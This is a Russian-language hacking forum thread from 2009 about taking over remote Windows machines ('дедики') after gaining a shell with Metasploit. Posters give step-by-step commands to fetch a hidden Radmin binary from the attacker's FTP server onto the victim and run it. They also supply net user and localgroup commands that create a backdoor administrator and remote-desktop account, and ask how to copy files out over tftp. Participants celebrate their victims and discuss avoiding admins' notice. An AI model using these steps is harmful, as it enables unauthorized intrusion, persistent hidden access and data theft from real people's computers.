Статьи Дедик или поможет нам Metasploit 3.2

Discussion in 'Статьи' started by stopxaker, 5 Jan 2009.

  1. dyExplode

    dyExplode Elder - Старейшина

    Joined:
    13 Jan 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    0
    теперь чтоб всё Всем было понятно:
    сборку teminal качаем тут http://lebed.ucoz.ru/soft/terminal.zip
    radmin одним файлом качаем тут http://depositfiles.com/files/1763484 gпарль на архив qiq.ru(инструкция прилагается) установка скрыта от глаз пользователя.
    теперь с ftp в качестве сервера на своём компе использую serv-U настроенный на анононимный вход.
    затем получив шел Мы увидим чтото наподобие
    Code:
    C:\windows\system32
    затем набираем
    Code:
    C:\windows\system32>ftp -A xxx.xxx.xxx.xxx
    где xxx.xxx.xxx.xxx ip Вашего компьютера или какого либо другого где стоит ftp сервер на котором лежит Наш радмин
    после чего Мы увидим
    Code:
    ftp>
    далее
    Code:
    ftp>get hack.exe
    где hack.exe и будет Наш радмин естественно имя можно использовать любое.
    после того как файл скачается(например в serv-U видно когда идёт процесс скачки) закрываем соединение и выходим из клиента ftp
    Code:
    close
    Code:
    quit
    также некоторых может пугать что в шеле часто не отображается приглашение клиента
    Code:
    ftp>
    но всё работает и бояться не нужно.
    после того как файл залит и Мы вышли из ftp клиента командой
    Code:
    dir
    проверяем есть ли в папке наш файл если есть запускаем Его
    Code:
    C:\windows\system32\hack.exe
    после чего желательно проверить есть ли Он в процессах командой
    Code:
    tasklist
    если есть то всё нормально можно запускать вьювера и конектицца к компу. также не следует бояться что первые несколько минут иногда нельзя подключиться но это проходит. надеюсь понятно обьяснил
     
    1 person likes this.
  2. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    бля, вот радмин никак не появляется в списке tasklist (нету r-server.exe).
    заливаю в диск С жертвы,тотом пишу:
    radmin.exe (так называется файл).
    вроде запускается, но нигде нету, да и вювер не видет.

    и еще, на дедике есть папка например 111. как его скачать к себе?
    делаю tftp put _свой_IP_tftp_сервера 111 , но это для одиночного файла.
    никто незнает как написать для папки целиком?
     
    #242 B1t.exe, 10 Jan 2009
    Last edited: 10 Jan 2009
  3. D Mak

    D Mak Elder - Старейшина

    Joined:
    23 Jun 2007
    Messages:
    136
    Likes Received:
    27
    Reputations:
    0
    никак, фтп пофайлово только отдает
     
  4. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    статья рул) мучался 3 дня и наконецто первая жертва)
     
    2 people like this.
  5. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    с шеллом тебя :) поверти у меня тоже всё сначало было не всё гладко , по этому и выложил статью когда во всём разобрался и всё начало работать
     
    1 person likes this.
  6. NiGHt-LEshiY

    NiGHt-LEshiY Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    46
    Likes Received:
    4
    Reputations:
    0
    .
     
    #246 NiGHt-LEshiY, 10 Jan 2009
    Last edited: 27 Sep 2015
  7. dyExplode

    dyExplode Elder - Старейшина

    Joined:
    13 Jan 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    0
    правильно! сначала нужно совсем разобраться как и что работает и по какому принципу а потом уже приступать к действию в противном же случае можно легко быть замеченым админом.
     
  8. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    как решить проблему при конекте к удаленному столу "интерактивный вход в систему на данном компьютере запрещен локальной политикой" или нужна перезагрузка компа после добавления юзера в смд ?
     
  9. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    stopxaker

    чувак, получился ! все таки проблема у меня была. щас уже нормально получаю шеллы !
    респект тебе !
     
    1 person likes this.
  10. nepster

    nepster Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    96
    Likes Received:
    14
    Reputations:
    -1
    Тебе нужно зайти в панель управления и оттуда разрешить интерактивное ...
     
  11. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    уже сто раз писалось , напишу ещё раз

    Code:
    cmd
    net user user pass /add
    net localgroup Administrators user /add
    [COLOR=Yellow][B]net localgroup "Remote Desktop Users" user /add[/B][/COLOR]
    net accounts /maxpwage:unlimited
    exit
    
    под русскую версию ХР
    Code:
    net localgroup Администраторы admin /add 
    net localgroup "пользователи удаленного рабочего стола" admin /add
     
  12. <Trash_man>

    <Trash_man> Member

    Joined:
    3 Jan 2008
    Messages:
    14
    Likes Received:
    15
    Reputations:
    0
    фигасе игрушка :confused:
     
  13. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    а как ето сделать если в панель управления не зайти , админ сидит играет в L2 , имеется только радмин и смд ?
     
    1 person likes this.
  14. dyExplode

    dyExplode Elder - Старейшина

    Joined:
    13 Jan 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    0
    http://forum.antichat.ru/showpost.php?p=1050370&postcount=251
    читай внимательней.
     
  15. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    завтро попробую , видимо там админ пшол спасть и выкл комп))
     
  16. *DeViL*

    *DeViL* Banned

    Joined:
    27 Nov 2007
    Messages:
    169
    Likes Received:
    56
    Reputations:
    0
    у мну все шелы пропали((( надо искать статические ип...
     
  17. NiGHt-LEshiY

    NiGHt-LEshiY Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    46
    Likes Received:
    4
    Reputations:
    0
    .
     
    #257 NiGHt-LEshiY, 11 Jan 2009
    Last edited: 27 Sep 2015
  18. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    можно хакать и динамический , но после релога инета IP изменится и не зайти будет в радмин или удаленку
     
  19. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    при попытке вывести активные задачи пишит C:\>tasklist
    tasklist
    'tasklist' is not recognized as an internal or external command,

    operable program or batch file.

    а при создании учетки пишит "net localgroup Administrators user /add
    System error 1378 has occurred." в чем проблема ?
     
  20. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    Ограниченные права.